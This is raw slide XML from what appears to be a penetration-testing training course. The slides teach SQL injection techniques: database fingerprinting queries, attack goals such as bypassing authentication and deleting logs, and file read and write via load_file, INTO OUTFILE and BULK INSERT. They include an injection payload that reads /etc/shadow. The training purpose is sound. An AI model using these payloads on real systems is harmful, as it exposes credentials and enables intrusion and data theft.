          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1981200"/>
            <a:ext cx="7848600" cy="4343400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 1: Attacker's View, Pen-Testing and Scoping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 2: Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 3: Server-Side Vuln Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 4: Server-Side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 5: Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 6: Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12292" name="Right Arrow 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="437210" y="4485810"/>
            <a:ext cx="762000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>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79620" y="156150"/>
            <a:ext cx="8001000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fingerprinting the Database (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412230" y="1459266"/>
            <a:ext cx="8305800" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A second option to fingerprint the server is where it stores its control data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Master database and schema tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>MS SQLServer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SELECT name  FROM master..sysobjects WHERE xtype = 'U';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SELECT table_name  FROM user_tables;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>PostgreSQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SELECT relname  FROM pg_class ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SELECT Select_priv FROM mysql.db;</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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Attack Ideas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1620190"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many different types of attacks are possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Bypass authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Retrieve records</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Modify transactions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Add users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Delete event logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Write Files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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Extend our Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37891" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1635180"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Modifying data is nice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>But what else is available to us during our test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will now explore various other attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The following methods depend on database types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77193"/>
            <a:ext cx="8458200" cy="44958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2484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b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>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38918"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An excellent exploit is reading and writing files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provides information and pivot capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database servers are the crown jewels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They contain much of the sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different RDBMS' provide different levels of reading and writing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If at all</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1296758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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Read File (MySQL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="108680" y="1725120"/>
            <a:ext cx="8915400" cy="4343400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Read files through SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>load_file()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>load_file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>can be part of a query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We need to use a UNION to make it work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Inject </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>' union select load_file('/etc/shadow'),1 #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>load data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> reads files into tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>load data infile 'c:\filename' into table temp</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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Write File (MySQL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67539" y="1566490"/>
            <a:ext cx="9144000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Writing files allow us to dump data to the file system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Use the INTO directive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM table INTO DUMPFILE '/result';</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM table INTO OUTFILE '/result'; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Can write anywhere MySQL has permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Can you say root?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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Read/Write File (Oracle)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="670810" y="1678900"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Oracle uses an Oracle package to read and write files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Named utl_file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Keep in mind that it may not be available to our permission level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses ora.ini to set accessible paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Syntax is in the notes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Read File (MS SQL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1608664"/>
            <a:ext cx="8686800" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>MS SQL uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Bulk Insert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Reads file that is specified</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Inserts it into a table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>BULK INSERT table FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>c:\boot.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Typically we will create an empty table to store this data first</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Write File (MS SQL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1680150"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>No native way within T-SQL to write to files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
